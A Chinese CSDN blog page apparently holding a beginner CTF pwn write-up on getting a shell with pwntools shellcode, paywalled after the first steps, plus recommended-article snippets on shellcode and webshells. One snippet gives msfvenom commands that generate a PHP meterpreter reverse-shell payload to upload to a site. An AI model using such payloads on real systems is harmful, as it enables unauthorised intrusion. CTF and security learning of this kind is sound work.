通过用shellcode获取shell

最新推荐文章于 2024-03-11 16:36:29 发布
最新推荐文章于 2024-03-11 16:36:29 发布
阅读量866 收藏 1
点赞数 1
分类专栏: pwn shellcode 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bestpotato/article/details/108961613
版权
本文详细介绍了如何通过shellcode获取shell的过程,包括分析题目文件类型和保护机制、反汇编程序、编写脚本注入shellcode以及最终运行脚本获取shell权限,夺旗成功。
摘要由CSDN通过智能技术生成

通过用shellcode获取shell

题目来源
题目要求:用pwntools生成shellcode进而获取shell权限夺得flag
题目解题大概思路

下载题目文件
在终端运行程序,查看题目文件类型和保护机制
用对应位数的IDA来打开题目文件
看题目的条件和内容
写python文件
运行python文件得到flag

1.终端运行程序,查看题目文件类型和保护机制

运行文件(好像不能输入数据)在这里插入图片描述

度娘一下: 出现段错误简单来说就是访问到了不该访问的内存 这些内存不属于用户态的权限范围

查看文件(checksec保护机制)

在这里插入图片描述

2.反汇编分析

把程序拉IDA里面分析,F5一键反汇编

最低0.47元/天 解锁文章
Seeyou西柚
关注
专栏目录
记一次shellcode提取经历
jmp esp
08-15 3384
前言闲来无事,以前都是去exploit-db找shellcode使用,但是有的时候似乎并不那么顺利,找到了之后却由于一些问题(比如之前有一次,要求shellcode里边不能出现0b和0c之类制表符,否则会提前中断,但是一些打开shellshellcode基本都有),想到如果自己掌握了提取方法,或许以后会方便一点,根据自己的要求进行一些更改或者调整指令,为此还专门学习了一下内联汇编的使用(发现并没有
使用Metasploit 获取远程 shell
KKKmeng的博客
06-08 267
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。
查看完整版本: 使用C语言编写提取通用shellcode的程序
yingfox的专栏
11-13 974
导读:   使用C语言编写提取通用shellcode的程序文章修改:Hume/冷雨飘心   文章注释:我非我[F.S.T]   信息来源:黑客基地   [code]/*   说明:此程序可以用标准c语言string格式打印出你所在ShellCodes函数中编写的shellcode   用vc编译时请使用Release格式并取消优化设置,否则不能正常运行   */   #include  
栈溢出攻击1——注入shellcode指令拿到shell
学习记录
09-15 2120
  在IDA的Function name这一栏里面,如下图所示,没有发现后门函数,说明这道题目需要自己写shellcode来拿到shell权限。 查看sub_80484E9函数的伪代码,如下所示。 int sub_80484E9() { char v1; // [esp+0h] [ebp-28h] puts("Could I know your name?"); myRead((int)&unk_804A060, 32); printf("Hi, %s.\n", &unk
一种提取shellcode的方法
爱.NET
07-16 381
一种提取shellcode的方法 lion@cnhonker.net 看到论坛里有网友问如何编写shellcode,虽然安全文摘里有不少关于shellcode的文章,但是都是一些现成的代码,很少有详细的讲解如何提取shellcode的文章,前几日听eyas说cnhonker有一些这方面的文章,就转过来了,算是给和我一样的初学者的一些资料吧,单步跟踪一下,会清楚很多。(提取出来的shellcode为...
详解缓冲区溢出-ShellCode提取等
08-22
这算是比较详细的讲解缓冲区溢出攻防等利用手段 从入门到精通 我相信看完后 哪怕对缓冲区溢出闻所未闻的人 也能成为一个高手 个中意识及生动的讲解方式 课后练习等~~ 相对这方面的知识网上还很少 而且入门级的就更少了 这里忍疼风险出来 需要的账户和密码已经打包在压缩文件中
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
在标签中,“linux_shellcode”指明了这个话题与Linux操作系统和shellcode有关,而“shell”则强调了shellcode的目标是获取shell。这表明源代码可能包含有关如何编写、编译和测试针对Linux x86系统的有效shellcode的...
"编写32位ARM平台shellcode,成功getshell获取flag
本题要求编写一个Shellcode,并将其发送到服务器端执行,如果Shellcode正确,则可以获取Shell权限,否则...然后,使用适当的工具或脚本将Shellcode发送到服务器,获取Shell权限,并运行/etc/flag.exe程序来获得flag。
shellcode-Pilot
leeham的博客
08-27 448
shellcode-Pilot 题目描述 CSAW 2017 Quals - ‘pilot’ writeup 本人做的是实验吧上边的pilot;和CSAW上边的pilot完全一样。 首先下载文件 file pilot #看到是64bit-elf;一会使用ida64打开 checksec #发现没有开启任何保护; 使用IDA-pro打开后F5热键查看源码,可以看到程序运行流程。...
Linux获得shell的方法大全
weixin_45441727的博客
03-15 1395
上传webshell 生成webshell msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw > /root/Desktop/shell.php 使用burpsuite将shell.php上传(上面jpg改格式的都会吧) 反弹shell1 制作监听脚本PHP msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw 然后
【逆向篇】分析一段简单的ShellCode——从TEB到函数地址获取
weixin_30608503的博客
10-17 186
其实分在逆向篇不太合适,因为并没有逆向什么程序。 在http://www.exploit-db.com/exploits/28996/上看到这么一段最简单的ShellCode,其中的技术也是比较常见的,0day那本书上也提到过,大神都用烂了。不过想来很久没有碰汇编了,就心血来潮,权当温习一下。 /* User32-free Messagebox Shellcode for an...
某大学信息安全竞赛——shellcode1 绕过strlen检查,绕过沙箱检查,执行orw shellcode拿到flag
fzucaicai的博客
05-14 1276
这是一道非常让人蛋疼的题目,之前我只听说过沙箱,但是并没有自己实际接触过沙箱这个保护机制,大概作用就是开了沙箱之后,会禁用掉某些函数,一旦我们使用了这个函数,比如我们在栈溢出构造ROP,或者写入shellcode执行时,只要含有这些函数,这个程序就会崩掉,这题目就开了沙箱。之前我有个疑问,这里明明没有exevce函数的引用,为什么我用pwntools工具写的 shellcode = asm(shellcraft.sh())或者网上抄来的execve(binsh)都不能打通呢??
初学pwn-攻防世界(get_shell)
天柱的博客
08-26 1846
初学pwn - writeUp 从攻防世界新手区的第一道题目开始,首先是get_shell,题目上说这道题很贱单,运行就可以获取shell。这里首先使用到的工具是nc(netcat)。 Netcat 是一款简单的Unix工具,使用UDP和TCP协议。使用它你可以轻易的建立任何连接。内建有很多实用的工具。功能非常强大,这里列举一下百度到的内容,这里就算了,之后再专门介绍一下。 telnet / 获取系统 banner 信息 传输文本信息 传输文件和目录 加密传输文件 端口扫描 远程控制 / 正方向 shel
简单shellcode学习
蚁景网安学院
07-10 1179
引言之前遇到没开启NX保护的时候,都是直接用pwtools库里的shellcode一把梭,也不太懂shellcode代码具体做了些什么,遇到了几道不能一把梭的题目,简单学习一下shell...
从后台得到webshell十大技巧大汇总
weixin_34198583的博客
03-17 247
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了...
通过shell得到数据库中权限的脚本
congbao6525的博客
08-27 244
有些时候想直接查看某个用户下对应的权限信息。自己每次从数据字典中查找有些太麻烦了。如果涉及的对象类型多一些,很容易遗漏。 一种方式就是通过exp直接导出对象的信息来,可以直接解析dump内容来得到object的一些信息,...
【土木人自学网安Day6】shell及多种获取shell的方式
最新发布
qq_44117967的博客
03-11 2212
主要介绍:shell的基本概念,各类获取shell的工具,获取shell的payload生成器使用,获取加密shell免杀的方法、shell稳定化的办法......
提取shellcode
weixin_33725807的博客
08-24 105
说明:此程序可以用标准c语言string格式打印出你所在ShellCodes函数中编写的shellcode 用vc编译时请使用Release格式并取消优化设置,否则不能正常运行 */ #i nclude <windows.h> #i nclude <stdio.h> #i nclude <winioctl.h> #define DEBUG ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值